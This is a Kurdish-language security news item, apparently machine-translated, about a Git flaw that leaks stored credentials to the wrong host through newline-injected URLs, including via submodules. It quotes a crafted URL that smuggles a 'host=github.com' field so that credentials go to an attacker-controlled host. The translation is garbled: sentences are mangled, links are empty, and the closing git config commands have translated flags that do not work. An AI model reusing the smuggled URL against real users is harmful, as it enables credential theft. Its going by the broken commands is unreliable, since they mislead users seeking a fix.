serbestberdanên rastkirî yên pergala kontrola çavkaniya belavkirî Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 û 2.17.4, di ku ji holê rakirin () di destkarê de"", ku dibe sedem ku pêbawerî ji mêvandarek xelet re werin şandin dema ku xerîdarek git xwe digihîne depoyek bi karanîna URL-ya taybetî ya formatkirî ya ku karakterek nû vedihewîne. Zehf dikare were bikar anîn da ku pêbaweriyên ji mêvandarek din were şandin ku ji serverek ku ji hêla êrîşkar ve tê kontrol kirin were şandin.
Dema ku URLek wekî "https://evil.com?%0ahost=github.com/" diyar bike, dema ku bi hostayê evil.com ve girêdide hilgirê pêbaweriyê dê pîvanên erêkirinê yên ku ji bo github.com hatine diyar kirin derbas bike. Pirsgirêk dema ku operasyonên wekî "git clone" pêk tînin, di nav wan de pêvajokirina URL-yên ji bo binemodulan jî heye (mînak, "git submodule update" dê bixweber URLên ku di pelê .gitmodules de ji depoyê hatine destnîşan kirin pêvajoyê bike). Di rewşên ku pêşdebirek bêyî dîtina URL-ê depoyek klon dike, xeternak e, mînakî, dema ku bi submodulan re dixebitin, an di pergalên ku çalakiyên otomatîkî de pêk tînin, mînakî, di skrîptên avakirina pakêtê de.
Ji bo astengkirina qelsiyên di guhertoyên nû de derbaskirina karakterek xêzek nû di her nirxan de ku bi protokola pevguhertina pêbaweriyê ve hatî veguheztin. Ji bo belavkirinê, hûn dikarin berdana nûvekirina pakêtê li ser rûpelan bişopînin , , , , , , .
Wekî rêyek ji bo astengkirina pirsgirêkê Dema ku xwe bigihînin depoyên giştî credential.helper-ê bikar neynin û di moda "-recurse-submodules" de bi depoyên neçalakkirî de "git clone" bikar neynin. Ji bo bi temamî neçalak bike credential.helper handler, ku dike û şîfreyan ji , parastin an pelek bi şîfre, hûn dikarin fermanan bikar bînin:
git config --neset credential.helper
git config --global -- unset credential.helper
git config --pergal --nesazkirin credential.helper
Source: opennet.ru